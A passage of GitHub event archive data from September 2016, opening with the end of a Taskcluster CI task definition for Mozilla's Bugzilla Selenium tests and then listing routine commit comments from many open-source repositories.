\\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.390Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.813Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"NEi9PYV_RAiLPPW4v9_Qdw\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Sel\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"selenium\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/selenium_log\\\"\": {\n                                \"type\": \"file\",\n                                \"path\": \"/selenium.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Selenium Tests\",\n                        \"description\": \"Selenium Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.390Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.390Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DMPwKGYlRU63tistQqvPzQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.390Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.813Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-27T02:16:26Z"}
{"id":"4621594099","type":"CommitCommentEvent","actor":{"login":"trevnorris"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19183838,"position":null,"line":null,"path":null,"commit_id":"4f55158587ab2b701c11085bd39c57d9edb3ea94","created_at":"2016-09-27T02:19:25Z","updated_at":"2016-09-27T02:19:25Z","body":"@watson Timers share `TimerWrap` handles, but each timer receives a unique JS object that's linked against the native handle. This commit triggers the callbacks for each JS object. /cc @Fishrock123 for additional information"}},"created_at":"2016-09-27T02:19:25Z"}
{"id":"4621595442","type":"CommitCommentEvent","actor":{"login":"kocio-pl"},"repo":{"name":"gravitystorm/openstreetmap-carto"},"payload":{"comment":{"id":19183842,"position":null,"line":null,"path":null,"commit_id":"e4a4fd71656d0c716b31083901340d4ef0738974","created_at":"2016-09-27T02:20:00Z","updated_at":"2016-09-27T02:20:00Z","body":"Oh, I guess this is the right place to comment about creating v2.44.0 section..."}},"created_at":"2016-09-27T02:20:00Z"}
{"id":"4621597055","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19183845,"position":15,"line":0,"path":"libraries/stdlib/src/kotlin/collections/AbstractCollection.kt","commit_id":"df5c628bbc5a211f12d5b866e4ffd0cc3cf3c598","created_at":"2016-09-27T02:20:35Z","updated_at":"2016-09-27T02:20:35Z","body":"|`line 31`|\n|---|\nShould we require mandatory implementation of `hashCode` and `equals`? This makes Abstract*Mutable*Collection implementation experience different in JVM and JS.\n\nNote that by default these methods do not throw, they just compare collection referentially rather than structurally."}},"created_at":"2016-09-27T02:20:35Z"}
{"id":"4621598008","type":"CommitCommentEvent","actor":{"login":"lheagy"},"repo":{"name":"ubcgif/em_examples"},"payload":{"comment":{"id":19183850,"position":4,"line":6,"path":"requirements.txt","commit_id":"dfb3a0b226f282c0d2a43c001329156f9428e724","created_at":"2016-09-27T02:20:58Z","updated_at":"2016-09-27T02:20:58Z","body":"this is this repository and does not need to be referenced in the requirements.txt"}},"created_at":"2016-09-27T02:20:58Z"}
{"id":"4621610270","type":"CommitCommentEvent","actor":{"login":"chosh31"},"repo":{"name":"kimsclub/kimsclub.github.io"},"payload":{"comment":{"id":19183873,"position":2,"line":2,"path":"test.txt","commit_id":"85dffccf8b61348f08a33fce3a7b33c55ca8447f","created_at":"2016-09-27T02:25:48Z","updated_at":"2016-09-27T02:25:48Z","body":"12345 임ㅋ"}},"created_at":"2016-09-27T02:25:48Z"}
{"id":"4621613910","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19183888,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-27T02:27:11Z","updated_at":"2016-09-27T02:27:11Z","body":"i think the windows size is wrong. so you must change debug with the window size. \r\nand you will see the \"C\" button.\r\n\r\n> mywindow = [[UIWindow alloc] initWithFrame:CGRectMake(0, 110, size.width,50)];\r\n button = [UIButton buttonWithType:UIButtonTypeCustom];\r\n    [button setTitle:@\"X\" forState:UIControlStateNormal];\r\n    [button setFrame:CGRectMake(0, 0, 30, 50)];\r\n    [button setBackgroundColor:[UIColor redColor]];\r\n>button1 = [UIButton buttonWithType:UIButtonTypeCustom];\r\n     [button1 setTitle:@\"C\" forState:UIControlStateNormal];\r\n     [button1 setFrame:CGRectMake(size.width-30, 0, 30, 50)];\r\n     [button1 setBackgroundColor:[UIColor blueColor]];\r\n>imgview1 = [[UIImageView alloc] initWithFrame: CGRectMake(0, 0, 30, 50)];\r\n imgview2 = [[UIImageView alloc] initWithFrame: CGRectMake(30, 0, 30, 50)];\r\n imgview3 = [[UIImageView alloc] initWithFrame: CGRectMake(60, 0, 30, 50)];\r\n imgview4 = [[UIImageView alloc] initWithFrame: CGRectMake(90, 0, 30, 50)];\r\n imgview5 = [[UIImageView alloc] initWithFrame: CGRectMake(120, 0, 30, 50)];\r\n\r\n"}},"created_at":"2016-09-27T02:27:11Z"}
{"id":"4621618359","type":"CommitCommentEvent","actor":{"login":"audio99"},"repo":{"name":"birchsport/titanic"},"payload":{"comment":{"id":19183896,"position":null,"line":null,"path":null,"commit_id":"d4136a8849f6eecf02dc268ba24f74743cfa1d6a","created_at":"2016-09-27T02:28:55Z","updated_at":"2016-09-27T02:28:55Z","body":"what is this?, only calls algoritm method?"}},"created_at":"2016-09-27T02:28:55Z"}
{"id":"4621619767","type":"CommitCommentEvent","actor":{"login":"nmenego"},"repo":{"name":"nmenego/GitTest"},"payload":{"comment":{"id":19183898,"position":null,"line":null,"path":null,"commit_id":"5f7f30471bc6cf0e33fd660eb969da6fae37bf15","created_at":"2016-09-27T02:29:30Z","updated_at":"2016-09-27T02:29:30Z","body":"hoy mike sayop man ni!!!!"}},"created_at":"2016-09-27T02:29:30Z"}
{"id":"4621644182","type":"CommitCommentEvent","actor":{"login":"Saisimon"},"repo":{"name":"Saisimon/tip"},"payload":{"comment":{"id":19183954,"position":null,"line":null,"path":null,"commit_id":"894175a57992a53b2d371fafafb7c5a58d474a04","created_at":"2016-09-27T02:39:08Z","updated_at":"2016-09-27T02:39:08Z","body":"不要提交二进制文件呀"}},"created_at":"2016-09-27T02:39:08Z"}
{"id":"4621647009","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19183964,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-27T02:40:16Z","updated_at":"2016-09-27T02:40:16Z","body":"[https://drive.google.com/file/d/0B0HV9VpMdTXRT0tlSUJQREJvSWM/view?usp=sharing](url)"}},"created_at":"2016-09-27T02:40:16Z"}
{"id":"4621652200","type":"CommitCommentEvent","actor":{"login":"horse007666"},"repo":{"name":"horse007666/openvpn"},"payload":{"comment":{"id":19183976,"position":null,"line":null,"path":null,"commit_id":"35b2e916a4977d033450372226f9abfb2ca18c0f","created_at":"2016-09-27T02:42:27Z","updated_at":"2016-09-27T02:42:27Z","body":"openvpn on VPS on IHEP"}},"created_at":"2016-09-27T02:42:27Z"}
{"id":"4621656653","type":"CommitCommentEvent","actor":{"login":"MarshallOfSound"},"repo":{"name":"MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-"},"payload":{"comment":{"id":19183982,"position":null,"line":null,"path":null,"commit_id":"944c3f89635f26ab4ef693fca32cdb1f1e2fd13f","created_at":"2016-09-27T02:44:13Z","updated_at":"2016-09-27T02:44:13Z","body":"@berryelectronics You might be interested in this magic, no longer version control PNG files, all the PNG's and icon files are generated dynamically from SVG's at build time\r\n\r\n**magic** 🎉 "}},"created_at":"2016-09-27T02:44:13Z"}
{"id":"4621658249","type":"CommitCommentEvent","actor":{"login":"lihaiping"},"repo":{"name":"lihaiping/happy"},"payload":{"comment":{"id":19183987,"position":null,"line":null,"path":null,"commit_id":"e6b250826426826a06d07ae8340c77e4e60a51e1","created_at":"2016-09-27T02:44:52Z","updated_at":"2016-09-27T02:44:52Z","body":"good"}},"created_at":"2016-09-27T02:44:52Z"}
{"id":"4621660441","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/MOHA-Kafka"},"payload":{"comment":{"id":19183991,"position":23,"line":63,"path":"src/main/java/org/kisti/moha/MOHA_Client.java","commit_id":"5da9e02ab20daf4fc38265b1e0a31fcfc6c6f985","created_at":"2016-09-27T02:45:43Z","updated_at":"2016-09-27T02:45:43Z","body":"updated the main function logics"}},"created_at":"2016-09-27T02:45:43Z"}
{"id":"4621661762","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/MOHA-Kafka"},"payload":{"comment":{"id":19183994,"position":66,"line":106,"path":"src/main/java/org/kisti/moha/MOHA_Client.java","commit_id":"5da9e02ab20daf4fc38265b1e0a31fcfc6c6f985","created_at":"2016-09-27T02:46:15Z","updated_at":"2016-09-27T02:46:15Z","body":"updated the MOHA_Client constructor logic"}},"created_at":"2016-09-27T02:46:15Z"}
{"id":"4621662709","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/MOHA-Kafka"},"payload":{"comment":{"id":19183998,"position":24,"line":64,"path":"src/main/java/org/kisti/moha/MOHA_Client.java","commit_id":"5da9e02ab20daf4fc38265b1e0a31fcfc6c6f985","created_at":"2016-09-27T02:46:37Z","updated_at":"2016-09-27T02:46:37Z","body":"updated the main function logic"}},"created_at":"2016-09-27T02:46:37Z"}
{"id":"4621664140","type":"CommitCommentEvent","actor":{"login":"tronatula"},"repo":{"name":"joel1st/championweb"},"payload":{"comment":{"id":19184009,"position":null,"line":null,"path":null,"commit_id":"4d84ca54a9c96456849afbc4ca99e8ad96acc719","created_at":"2016-09-27T02:47:08Z","updated_at":"2016-09-27T02:47:08Z","body":"Still no new 6.19 data on the web."}},"created_at":"2016-09-27T02:47:08Z"}
{"id":"4621664161","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/MOHA-Kafka"},"payload":{"comment":{"id":19184010,"position":88,"line":131,"path":"src/main/java/org/kisti/moha/MOHA_Client.java","commit_id":"5da9e02ab20daf4fc38265b1e0a31fcfc6c6f985","created_at":"2016-09-27T02:47:09Z","updated_at":"2016-09-27T02:47:09Z","body":"updated the init function logic."}},"created_at":"2016-09-27T02:47:09Z"}
{"id":"4621666036","type":"CommitCommentEvent","actor":{"login":"jbirchfield-ps"},"repo":{"name":"birchsport/titanic"},"payload":{"comment":{"id":19184012,"position":null,"line":null,"path":null,"commit_id":"d4136a8849f6eecf02dc268ba24f74743cfa1d6a","created_at":"2016-09-27T02:47:51Z","updated_at":"2016-09-27T02:47:51Z","body":"Sorry, I don't understand your question."}},"created_at":"2016-09-27T02:47:51Z"}
{"id":"4621666877","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19184013,"position":null,"line":null,"path":null,"commit_id":"f040685b0cbec18feb981fdad96389a3b28b676d","created_at":"2016-09-27T02:48:10Z","updated_at":"2016-09-27T02:48:10Z","body":"@pfalcon FYI.  A long overdue optimisation."}},"created_at":"2016-09-27T02:48:10Z"}
{"id":"4621691910","type":"CommitCommentEvent","actor":{"login":"ucchyocean"},"repo":{"name":"Androkai/LunaChat"},"payload":{"comment":{"id":19184057,"position":null,"line":null,"path":null,"commit_id":"cbbdfd0208e9d1f939f9d164a67a9f50b0ef9882","created_at":"2016-09-27T02:58:22Z","updated_at":"2016-09-27T02:58:22Z","body":"Oh, I could understand this meaning. Did LunaChat's dependency cause the error at somewhere?\r\n\r\nI can fix this issue by adding \"exclusions\" into LunaChat's pom.xml file, like the following link.\r\nhttps://github.com/ucchyocean/TravisCI-BuildTesting/commits/master\r\n\r\nDoes this issue have high priority? If you want, I can fix this at LunaChat repository right now."}},"created_at":"2016-09-27T02:58:22Z"}
{"id":"4621693715","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19184061,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-27T02:59:06Z","updated_at":"2016-09-27T02:59:06Z","body":"already fix download release r2"}},"created_at":"2016-09-27T02:59:06Z"}
{"id":"4626574136","type":"CommitCommentEvent","actor":{"login":"zamaliev"},"repo":{"name":"zamaliev/pesokadel"},"payload":{"comment":{"id":19197144,"position":4,"line":8,"path":"index.php","commit_id":"d66653f01a2846ca964f7117551e4f6502243b19","created_at":"2016-09-27T20:00:03Z","updated_at":"2016-09-27T20:00:03Z","body":"test"}},"created_at":"2016-09-27T20:00:03Z"}
{"id":"4626577789","type":"CommitCommentEvent","actor":{"login":"ShatteredMotion"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19197152,"position":17,"line":71,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"71419f8cd32a849b86f92787c558565ae3b2772a","created_at":"2016-09-27T20:00:38Z","updated_at":"2016-09-27T20:00:38Z","body":"That's done further down in the catch-block, isn't it?"}},"created_at":"2016-09-27T20:00:38Z"}
{"id":"4626578317","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19197155,"position":205,"line":205,"path":"api/labs/easyrtc_recorder.js","commit_id":"45ee1d0f3686184dffd126f599affc1a499d7df9","created_at":"2016-09-27T20:00:43Z","updated_at":"2016-09-27T20:00:43Z","body":"type should use \"current\" mineType"}},"created_at":"2016-09-27T20:00:43Z"}
{"id":"4626579807","type":"CommitCommentEvent","actor":{"login":"orbitcowboy"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19197163,"position":18,"line":1444,"path":"lib/tokenize.cpp","commit_id":"659263802205de68eee3b987d9a5710faa337e38","created_at":"2016-09-27T20:00:59Z","updated_at":"2016-09-27T20:00:59Z","body":"g++-5.4.0 reports\r\n\r\n```\r\nlib/tokenize.cpp: In member function ‘simplifyTypedef’:\r\nlib/tokenize.cpp:1479:0: warning: ‘tok3’ may be used uninitialized in this function [-Wmaybe-uninitialized]\r\n                                 Token::createMutualLinks(tok2, tok3);\r\n ^\r\nlib/tokenize.cpp:1450:36: note: ‘tok3’ was declared here\r\n                             Token *tok3;\r\n                                    ^\r\n\r\n```\r\nI compiled cppcheck with following command:\r\n\r\n`sudo make  HAVE_RULES=yes CXX_FLAGS='-O3' `\r\n"}},"created_at":"2016-09-27T20:00:59Z"}
{"id":"4626580462","type":"CommitCommentEvent","actor":{"login":"dbuenzli"},"repo":{"name":"dbuenzli/topkg"},"payload":{"comment":{"id":19197167,"position":3,"line":3,"path":"CHANGES.md","commit_id":"e8d7220bfaa3494f3d02ae4121343e873902911b","created_at":"2016-09-27T20:01:08Z","updated_at":"2016-09-27T20:01:08Z","body":"Indeed thx."}},"created_at":"2016-09-27T20:01:08Z"}
{"id":"4626583175","type":"CommitCommentEvent","actor":{"login":"AdamLiechty"},"repo":{"name":"nodeca/mincer"},"payload":{"comment":{"id":19197175,"position":6,"line":43,"path":"lib/mincer/compressors/csso_compressor.js","commit_id":"56bbb68844b83a7245b6c96f09b0b02a4ea137e8","created_at":"2016-09-27T20:01:38Z","updated_at":"2016-09-27T20:01:38Z","body":"👍 "}},"created_at":"2016-09-27T20:01:38Z"}
{"id":"4626584724","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197179,"position":null,"line":null,"path":null,"commit_id":"7ab460fe905a6694b1e7b92c96b5a811c7505626","created_at":"2016-09-27T20:01:55Z","updated_at":"2016-09-27T20:01:55Z","body":"Prepare to mmap."}},"created_at":"2016-09-27T20:01:55Z"}
{"id":"4626585630","type":"CommitCommentEvent","actor":{"login":"pureocean"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":19197180,"position":8,"line":229,"path":"doc/ffmpeg.texi","commit_id":"dcc506a91e7745fc0e4d07e05ff8a13ee75ced41","created_at":"2016-09-27T20:02:05Z","updated_at":"2016-09-27T20:02:05Z","body":"The @code{-dn} option to disable copying data streams in input files."}},"created_at":"2016-09-27T20:02:05Z"}
{"id":"4626589664","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19197190,"position":null,"line":null,"path":null,"commit_id":"42df0986a25a150fe87b0e7c0589ef2507186742","created_at":"2016-09-27T20:02:49Z","updated_at":"2016-09-27T20:02:49Z","body":"Initial commit"}},"created_at":"2016-09-27T20:02:49Z"}
{"id":"4626590297","type":"CommitCommentEvent","actor":{"login":"Morik"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19197191,"position":17,"line":71,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"71419f8cd32a849b86f92787c558565ae3b2772a","created_at":"2016-09-27T20:02:56Z","updated_at":"2016-09-27T20:02:56Z","body":"Yes, missed the surrounding catch block, just saw the removed one."}},"created_at":"2016-09-27T20:02:56Z"}
{"id":"4626593810","type":"CommitCommentEvent","actor":{"login":"haberok"},"repo":{"name":"haberok/starting-monkey-to-human-path"},"payload":{"comment":{"id":19197203,"position":1,"line":2,"path":"Application.java","commit_id":"a8b12e01bab0033ec500e8122d713b82e7589a66","created_at":"2016-09-27T20:03:37Z","updated_at":"2016-09-27T20:03:37Z","body":"ПО-43 Хабиров А.Г. инициализацию успешно прошел. Готов приступить к\r\nвыполнению следующего задания”"}},"created_at":"2016-09-27T20:03:37Z"}
{"id":"4626598954","type":"CommitCommentEvent","actor":{"login":"kirushik"},"repo":{"name":"yurizhuravel/yelp_clone"},"payload":{"comment":{"id":19197211,"position":5,"line":6,"path":"app/views/restaurants/index.html.haml","commit_id":"5f093ec5181592759d3915ac529cb98007e6ef47","created_at":"2016-09-27T20:04:33Z","updated_at":"2016-09-27T20:04:33Z","body":"There are 20 restaurants, each with 20 reviews — how many SQL requests will rendering of this page trigger?\r\n\r\nThis is actually the best performance boost you can give to your Rails app (not taking [Russian doll caching](http://edgeguides.rubyonrails.org/caching_with_rails.html#russian-doll-caching) in account): associations preloading. [This article](http://blog.arkency.com/2013/12/rails4-preloading/) is almost 3 years old but still a must read for all Rails developers."}},"created_at":"2016-09-27T20:04:33Z"}
{"id":"4626600794","type":"CommitCommentEvent","actor":{"login":"dima911"},"repo":{"name":"PaulVanSchayck/google-scraper"},"payload":{"comment":{"id":19197221,"position":null,"line":null,"path":null,"commit_id":"a033a07e49d83120d98fed247bc0d4a848f6e0ca","created_at":"2016-09-27T20:04:52Z","updated_at":"2016-09-27T20:04:52Z","body":"config/secret.php\r\nnot in project"}},"created_at":"2016-09-27T20:04:52Z"}
{"id":"4626602840","type":"CommitCommentEvent","actor":{"login":"dima911"},"repo":{"name":"PaulVanSchayck/google-scraper"},"payload":{"comment":{"id":19197226,"position":null,"line":null,"path":null,"commit_id":"a033a07e49d83120d98fed247bc0d4a848f6e0ca","created_at":"2016-09-27T20:05:15Z","updated_at":"2016-09-27T20:05:15Z","body":"file db.php not in project"}},"created_at":"2016-09-27T20:05:15Z"}
{"id":"4626603231","type":"CommitCommentEvent","actor":{"login":"surgiie"},"repo":{"name":"surgiie/compean"},"payload":{"comment":{"id":19197228,"position":null,"line":null,"path":null,"commit_id":"90665edfc1b96b9df814d2b4832295a385dec557","created_at":"2016-09-27T20:05:19Z","updated_at":"2016-09-27T20:05:19Z","body":"xD I had the same issue with announcements vs announcement. \r\n\r\nKept going crazy when i got the 404 page. Lol\r\n"}},"created_at":"2016-09-27T20:05:19Z"}
{"id":"4626603800","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197230,"position":null,"line":null,"path":null,"commit_id":"7ab460fe905a6694b1e7b92c96b5a811c7505626","created_at":"2016-09-27T20:05:25Z","updated_at":"2016-09-27T20:05:25Z","body":"@alexkulya nice job!"}},"created_at":"2016-09-27T20:05:25Z"}
{"id":"4626608133","type":"CommitCommentEvent","actor":{"login":"yarwest"},"repo":{"name":"surgiie/compean"},"payload":{"comment":{"id":19197253,"position":null,"line":null,"path":null,"commit_id":"90665edfc1b96b9df814d2b4832295a385dec557","created_at":"2016-09-27T20:06:10Z","updated_at":"2016-09-27T20:06:10Z","body":"this cost me roughly an hour, if not more"}},"created_at":"2016-09-27T20:06:10Z"}
{"id":"4626608945","type":"CommitCommentEvent","actor":{"login":"msneddon"},"repo":{"name":"kbaseapps/GroupAPI"},"payload":{"comment":{"id":19197257,"position":37,"line":37,"path":"GroupAPI.spec","commit_id":"d788dc331895edf5db7d7ed2fba3f74cfecf6f54","created_at":"2016-09-27T20:06:19Z","updated_at":"2016-09-27T20:06:19Z","body":"I think the word 'load' is confusing (unclear where we are loading it to, and there is a ws-load command that saves objects), let's change it to 'get'."}},"created_at":"2016-09-27T20:06:19Z"}
{"id":"4626612712","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19197271,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T20:06:58Z","updated_at":"2016-09-27T20:06:58Z","body":">Now the filename is DokanSetup-1.0.1.5779.exe. Should it not be DokanSetup-1.0.1.1.exe 1.0.0.(0 + build number)?\r\n\r\nYes, it should be !\r\nbuild-number has to be reset but it is currently @Maxhy that has access to the appveyor configuration. I will request him the access to the appveyor account to make the change myself 👍 \r\n\r\nI fixed https://github.com/dokan-dev/dokany/commit/40719844e33f34087178af18eac3100351f0bfd9\r\nhttps://ci.appveyor.com/project/Maxhy/dokany/build/1.0.1-781/job/oi7d2t7vovni1hby/artifacts\r\n\r\n"}},"created_at":"2016-09-27T20:06:58Z"}
{"id":"4626622874","type":"CommitCommentEvent","actor":{"login":"afraser35"},"repo":{"name":"afraser35/Portfolio"},"payload":{"comment":{"id":19197297,"position":null,"line":null,"path":null,"commit_id":"25ee20f86b474f62443482484c1fd40575f0a16c","created_at":"2016-09-27T20:08:49Z","updated_at":"2016-09-27T20:08:49Z","body":"My biggest project in computer programming was creating my own crossword puzzle. It was a project assigned to me in CS 230 and it dealt with a lot of different programming codes in Python. To start me off I typed different steps to guide me through the project as you can see on each line with a hashtag. From line 10 to 24 the programming code I typed was for python to determine how many box spaces I needed for each word in the crossword puzzle. From line 26 to 36 the code I typed was to create the borders for the x and y columns so it actually created the boxes in crossword puzzle. Basically this coding helped make the design of a crossword puzzle. From line 40 to 52 I created my if-else statement so that way whoever was to play the game, each time they entered a word the program would determine if it's the correct letter or the wrong one. From lines 55 to 67 the code was to finish off the crossword puzzle with a border at the bottom that way whoever participated in the game and solved all the words would be notified that they completed the game."}},"created_at":"2016-09-27T20:08:49Z"}
{"id":"4626625973","type":"CommitCommentEvent","actor":{"login":"lboxell"},"repo":{"name":"gslab-econ/template"},"payload":{"comment":{"id":19197303,"position":null,"line":null,"path":null,"commit_id":"4ca2b7a423184a98ffc7ce18374635ce185b16b1","created_at":"2016-09-27T20:09:20Z","updated_at":"2016-09-27T20:09:20Z","body":"#12 "}},"created_at":"2016-09-27T20:09:20Z"}
{"id":"4626626493","type":"CommitCommentEvent","actor":{"login":"jsaleigh"},"repo":{"name":"BranchMetrics/web-branch-deep-linking"},"payload":{"comment":{"id":19197305,"position":6,"line":361,"path":"src/3_api.js","commit_id":"a45b761bd87226c456c2370b402607e744e52838","created_at":"2016-09-27T20:09:26Z","updated_at":"2016-09-27T20:09:26Z","body":"We're about to try to get references to `window` out of the code, or at least wrap it with a try-catch, to help with server rendering.  Not at all important, but if you have time that would be a cool add."}},"created_at":"2016-09-27T20:09:26Z"}
